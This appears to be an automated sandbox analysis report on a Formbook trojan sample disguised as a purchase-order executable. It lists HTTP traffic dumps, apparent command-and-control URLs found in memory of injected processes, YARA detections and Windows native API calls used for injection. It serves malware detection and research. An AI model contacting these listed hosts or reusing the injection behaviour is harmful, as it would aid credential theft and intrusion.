34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:17:25 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 
74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:17:28 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/html; charset=utf-8
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:17:34 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:17:36 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:17:39 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:17:41 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:18:02 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 15 Sep 2022 09:59:43 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4677Content-Type: text/html
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:18:04 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 15 Sep 2022 09:59:43 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4677Content-Type: text/html
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:18:07 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 15 Sep 2022 09:59:43 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4677Content-Type: text/html
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:18:09 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 15 Sep 2022 09:59:43 GMTAccept-Ranges: bytesContent-Length: 11816Vary: Accept-EncodingContent-Type: text/html
        Source: nslookup.exe, 00000005.00000002.4540879237.0000000004F0C000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.00000000041BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://code.jquery.com/jquery-3.3.1.min.js
        Source: Purchase Order_20240528.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
        Source: Purchase Order_20240528.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
        Source: nslookup.exe, 00000005.00000002.4540879237.0000000004F0C000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.00000000041BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://gmpg.org/xfn/11
        Source: nslookup.exe, 00000005.00000002.4540879237.0000000004D7A000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.000000000402A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://home-stroi0m.ru/l7wc/?jTZPp=rG0gXsVcMKnwL95DCAGLkXtixogTaqlVvgNhyV5MOQBbV9UvRUrQqDi5YjTtkNY5n
        Source: nslookup.exe, 00000005.00000002.4540879237.00000000045A0000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003850000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mavonorm-global.uk/ia1k/?5L0=2bCPy0&jTZPp=N7K37PwQwyq8WtMjD63BMb0ZEyGwsNHc8DxE6cCELPJHzMSs3RH
        Source: Purchase Order_20240528.exeString found in binary or memory: http://ocsp.comodoca.com0
        Source: qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4541673061.0000000004FA7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.futurereadyteaming.com
        Source: qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4541673061.0000000004FA7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.futurereadyteaming.com/d42u/
        Source: nslookup.exe, 00000005.00000002.4542692727.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: nslookup.exe, 00000005.00000002.4542692727.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: nslookup.exe, 00000005.00000002.4540879237.0000000004A56000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003D06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/1.20.2/TweenMax.min.js
        Source: nslookup.exe, 00000005.00000002.4540879237.0000000004A56000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003D06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css
        Source: nslookup.exe, 00000005.00000002.4542692727.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: nslookup.exe, 00000005.00000002.4542692727.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: nslookup.exe, 00000005.00000002.4542692727.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: nslookup.exe, 00000005.00000002.4542692727.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: nslookup.exe, 00000005.00000002.4542692727.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
        Source: nslookup.exe, 00000005.00000002.4540879237.0000000004A56000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003D06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.hover.com/home?source=expired
        Source: nslookup.exe, 00000005.00000002.4534212709.0000000002B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
        Source: nslookup.exe, 00000005.00000003.2406968840.0000000007B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
        Source: nslookup.exe, 00000005.00000002.4534212709.0000000002B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
        Source: nslookup.exe, 00000005.00000002.4534212709.0000000002B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
        Source: nslookup.exe, 00000005.00000002.4534212709.0000000002B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
        Source: nslookup.exe, 00000005.00000002.4534212709.0000000002B40000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4534212709.0000000002B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
        Source: nslookup.exe, 00000005.00000002.4534212709.0000000002B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
        Source: nslookup.exe, 00000005.00000002.4540879237.0000000004A56000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003D06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/MorphSVGPlugin.min.js
        Source: nslookup.exe, 00000005.00000002.4540879237.0000000004A56000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003D06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/SplitText.min.js
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/hover
        Source: Purchase Order_20240528.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
        Source: nslookup.exe, 00000005.00000002.4542692727.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: nslookup.exe, 00000005.00000002.4540879237.000000000427C000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.000000000352C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/?source=expired
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/about?source=expired
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/domain_pricing?source=expired
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/domains/results
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/email?source=expired
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/privacy?source=expired
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/renew/domain/allgiftedmalaysia.com?source=expired
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/renew?source=expired
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/tools?source=expired
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/tos?source=expired
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/transfer_in?source=expired
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.instagram.com/hover_domains
        Source: nslookup.exe, 00000005.00000002.4540879237.0000000003F58000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003208000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.shopnaya.fr/9rbi/?5L0=2bCPy0&jTZPp=UlNdZMK3GDRCBA0gS3f3uv0iXo

        E-Banking Fraud

        Source: Yara match File source: 00000003.00000002.2210026041.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.4539900115.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.4539802866.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000007.00000002.4541673061.0000000004F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.4538883092.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.2213803816.0000000001900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 00000003.00000002.2210026041.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.4539900115.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.4539802866.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000007.00000002.4541673061.0000000004F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.4538883092.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.2213803816.0000000001900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0.2.Purchase Order_20240528.exe.2815b80.0.raw.unpack, .cs Large array initialization: array initializer size 27104
        Source: 0.2.Purchase Order_20240528.exe.5280000.6.raw.unpack, .cs Large array initialization: array initializer size 27104
        Source: initial sample Static PE information: Filename: Purchase Order_20240528.exe
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622B60 NtClose,LdrInitializeThunk,3_2_01622B60
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01622DF0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01622C70
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_016235C0 NtCreateMutant,LdrInitializeThunk,3_2_016235C0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01624340 NtSetContextThread,3_2_01624340
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01624650 NtSuspendThread,3_2_01624650
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622BE0 NtQueryValueKey,3_2_01622BE0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622BF0 NtAllocateVirtualMemory,3_2_01622BF0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622BA0 NtEnumerateValueKey,3_2_01622BA0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622B80 NtQueryInformationFile,3_2_01622B80
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622AF0 NtWriteFile,3_2_01622AF0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622AD0 NtReadFile,3_2_01622AD0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622AB0 NtWaitForSingleObject,3_2_01622AB0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622D30 NtUnmapViewOfSection,3_2_01622D30
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622D00 NtSetInformationFile,3_2_01622D00
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622D10 NtMapViewOfSection,3_2_01622D10
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622DD0 NtDelayExecution,3_2_01622DD0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622DB0 NtEnumerateKey,3_2_01622DB0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622C60 NtCreateKey,3_2_01622C60
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622C00 NtQueryInformationProcess,3_2_01622C00
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622CF0 NtOpenProcess,3_2_01622CF0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622CC0 NtQueryVirtualMemory,3_2_01622CC0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622CA0 NtQueryInformationToken,3_2_01622CA0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622F60 NtCreateProcessEx,3_2_01622F60
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622F30 NtCreateSection,3_2_01622F30
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622FE0 NtCreateFile,3_2_01622FE0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622FA0 NtQuerySection,3_2_01622FA0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622FB0 NtResumeThread,3_2_01622FB0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622F90 NtProtectVirtualMemory,3_2_01622F90
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622E30 NtWriteVirtualMemory,3_2_01622E30
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622EE0 NtQueueApcThread,3_2_01622EE0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622EA0 NtAdjustPrivilegesToken,3_2_01622EA0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622E80 NtReadVirtualMemory,3_2_01622E80
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01623010 NtOpenDirectoryObject,3_2_01623010
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01623090 NtSetValueKey,3_2_01623090
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_016239B0 NtGetContextThread,3_2_016239B0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01623D70 NtOpenThread,3_2_01623D70
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01623D10 NtOpenProcessToken,3_2_01623D10
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_0042B543 NtClose,3_2_0042B543
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F4340 NtSetContextThread,LdrInitializeThunk,5_2_031F4340
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F4650 NtSuspendThread,LdrInitializeThunk,5_2_031F4650
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031F2B60 NtClose,LdrInitializeThunk,5_2_031F2B60
